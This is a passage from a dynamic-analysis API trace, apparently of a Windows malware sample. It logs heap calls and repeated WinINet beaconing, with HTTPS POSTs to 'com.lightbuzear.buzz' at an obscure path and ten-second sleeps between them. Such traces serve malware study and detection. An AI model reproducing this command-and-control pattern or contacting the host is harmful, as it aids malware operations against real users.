InternetCloseHandle (hInternet=0xcc0004) returned 1 [0306.247] FreeLibrary (hLibModule=0x71570000) returned 1 [0306.247] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0306.247] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0306.247] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef208 | out: hHeap=0x4780000) returned 1 [0306.247] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed30 | out: hHeap=0x4780000) returned 1 [0306.248] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed08 | out: hHeap=0x4780000) returned 1 [0306.248] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec40 | out: hHeap=0x4780000) returned 1 [0306.248] Sleep (dwMilliseconds=0x2710) [0306.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0306.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0306.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0306.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0306.291] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0306.291] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0306.561] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0306.561] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0306.561] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0306.562] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c888 [0306.562] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0306.562] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c948 [0306.562] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c888 | out: hHeap=0x4780000) returned 1 [0306.562] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0306.562] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c948 | out: hHeap=0x4780000) returned 1 [0306.562] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c948 [0306.562] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed08 [0306.562] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed08 | out: hHeap=0x4780000) returned 1 [0306.562] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0306.562] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eec40 [0306.563] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0306.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0306.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0306.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0306.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0306.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0306.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0306.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0306.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6c0 [0306.563] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0306.563] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482cac8 [0306.564] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0306.564] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c960 [0306.564] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cac8 | out: hHeap=0x4780000) returned 1 [0306.564] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0306.564] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c960 | out: hHeap=0x4780000) returned 1 [0306.564] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eed08 [0306.564] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0306.564] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0306.564] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed08 | out: hHeap=0x4780000) returned 1 [0306.564] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed08 [0306.564] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbda0 [0306.564] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed30 [0306.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbda0 | out: hHeap=0x4780000) returned 1 [0306.565] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0306.565] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0306.565] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0306.566] FreeLibrary (hLibModule=0x71780000) returned 1 [0306.566] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed30 | out: hHeap=0x4780000) returned 1 [0306.566] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0306.566] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed30 [0306.566] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0306.566] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5b0 [0306.567] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0306.567] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0306.567] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0306.567] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0306.567] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0306.567] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0306.567] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce690 [0306.567] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0306.567] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ca20 [0306.567] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0306.567] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca08 [0306.567] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca20 | out: hHeap=0x4780000) returned 1 [0306.567] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0306.567] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca08 | out: hHeap=0x4780000) returned 1 [0306.567] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482cae0 [0306.567] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eefb0 [0306.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eefb0 | out: hHeap=0x4780000) returned 1 [0306.568] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0306.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef028 [0306.568] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0306.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef230 [0306.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0306.568] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6b0 [0306.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0306.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0306.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0306.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0306.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0306.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0306.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0306.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ca68 [0306.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0306.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb28 [0306.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca68 | out: hHeap=0x4780000) returned 1 [0306.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0306.569] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb28 | out: hHeap=0x4780000) returned 1 [0306.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482c870 [0306.569] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef000 [0306.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef000 | out: hHeap=0x4780000) returned 1 [0306.570] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0306.570] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0306.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0306.570] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0306.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0306.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0306.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0306.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0306.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0306.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0306.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0306.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c9c0 [0306.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0306.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482cb40 [0306.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c9c0 | out: hHeap=0x4780000) returned 1 [0306.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0306.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482cb40 | out: hHeap=0x4780000) returned 1 [0306.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef398 [0306.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0306.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0306.571] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef398 | out: hHeap=0x4780000) returned 1 [0306.571] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eef38 [0306.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0306.572] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef208 [0306.572] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0306.573] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0306.573] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0306.573] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0306.574] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef208 | out: hHeap=0x4780000) returned 1 [0306.574] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0306.574] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0306.574] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0306.574] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0306.574] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0306.574] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0306.594] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0306.594] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0306.594] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0306.594] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c978 [0306.594] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0306.594] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca38 [0306.594] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c978 | out: hHeap=0x4780000) returned 1 [0306.594] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0306.594] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca38 | out: hHeap=0x4780000) returned 1 [0306.594] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47eef88 [0306.594] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0306.594] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb898 [0306.594] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eef88 | out: hHeap=0x4780000) returned 1 [0306.594] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef118 [0306.594] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb8d0 [0306.595] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef140 [0306.595] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb8d0 | out: hHeap=0x4780000) returned 1 [0306.595] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0306.596] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0306.596] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0307.606] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef140 | out: hHeap=0x4780000) returned 1 [0307.607] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0307.607] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0307.608] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0307.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0307.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0307.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0307.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5c0 [0307.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0307.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0307.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0307.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5b0 [0307.608] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0307.608] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c990 [0307.609] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0307.609] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ca68 [0307.609] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c990 | out: hHeap=0x4780000) returned 1 [0307.609] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0307.609] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca68 | out: hHeap=0x4780000) returned 1 [0307.609] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef208 [0307.609] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0307.609] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0307.609] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef208 | out: hHeap=0x4780000) returned 1 [0307.609] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef280 [0307.609] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0307.609] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef398 [0307.609] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0307.610] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0307.610] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0307.610] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0307.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef398 | out: hHeap=0x4780000) returned 1 [0307.611] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0307.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0307.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6f0 [0307.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0307.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0307.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0307.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0307.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0307.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5f0 [0307.611] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0307.611] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ca08 [0307.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0307.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c888 [0307.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ca08 | out: hHeap=0x4780000) returned 1 [0307.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0307.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c888 | out: hHeap=0x4780000) returned 1 [0307.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47ef2d0 [0307.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0307.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0307.612] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef2d0 | out: hHeap=0x4780000) returned 1 [0307.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef140 [0307.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0307.612] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47ef078 [0307.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0307.613] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0307.613] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0307.613] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0307.614] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef078 | out: hHeap=0x4780000) returned 1 [0307.614] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0307.614] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0307.614] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0307.614] FreeLibrary (hLibModule=0x71570000) returned 1 [0307.615] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0307.615] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0307.615] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef230 | out: hHeap=0x4780000) returned 1 [0307.615] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ef028 | out: hHeap=0x4780000) returned 1 [0307.616] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed30 | out: hHeap=0x4780000) returned 1 [0307.616] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eec40 | out: hHeap=0x4780000) returned 1 [0307.616] Sleep (dwMilliseconds=0x2710) [0307.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0307.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0307.633] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0307.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5c0 [0307.633] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0307.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0307.633] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0307.633] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce730 [0307.633] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0307.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482c960 [0307.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0307.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482c990 [0307.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c960 | out: hHeap=0x4780000) returned 1 [0307.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0307.634] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482c990 | out: hHeap=0x4780000) returned 1 [0307.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ca08 [0307.634] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47eed30 [0307.635] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47eed30 | out: hHeap=0x4780000) returned 1 [0307.635] HeapFree 